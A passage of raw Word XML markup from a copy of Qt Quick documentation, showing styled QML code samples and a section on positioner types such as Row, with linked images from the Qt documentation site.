          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>80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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">        height</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>80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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">        color</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"green"</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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B75670">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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png"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"http://doc.qt.io/qt-5/images/qml-uses-layouts-anchors.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1034" type="#_x0000_t75" alt="" style="width:150.9pt;height:151.5pt">
            <v:imagedata r:id="rId519" r:href="rId520"/>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00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00C21832" w:rsidRDefault="00821B8B" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="694" w:name="positioners"/>
      <w:bookmarkStart w:id="695" w:name="_Toc483000678"/>
      <w:bookmarkStart w:id="696" w:name="_Toc483003695"/>
      <w:bookmarkStart w:id="697" w:name="_Toc483604030"/>
      <w:bookmarkStart w:id="698" w:name="_Toc483605250"/>
      <w:bookmarkEnd w:id="694"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Positioners</w:t>
      </w:r>
      <w:bookmarkEnd w:id="695"/>
      <w:bookmarkEnd w:id="696"/>
      <w:bookmarkEnd w:id="697"/>
      <w:bookmarkEnd w:id="698"/>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For the common case of wanting to</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a set of types in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>regular pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Qt Quick provides some </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>positioner types</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Items placed in a positioner are automatically positioned in some way; for example, a</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId521" w:anchor="row" w:history="1">
        <w:r w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Row</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>positions items to be horizontally adjacent (forming a row).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For full details see</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId522" w:history="1">
        <w:r w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item Positioners</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the documentation for</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId523" w:history="1">
        <w:r w:rsidRPr="00821B8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>the positioner types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</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2.3</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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width</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300</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height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100</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Row</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// The "Row" type lays out its child items in a horizontal line</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spacing</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20</w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Places 20px of space between items</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Rectangle</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width</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80</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height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80</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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Rectangle</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width</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80</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height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80</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</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Rectangle</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width</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80</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height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80</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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rPr>
      </w:pP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rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821B8B" w:rsidRPr="00821B8B" w:rsidRDefault="00821B8B" w:rsidP="00821B8B">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
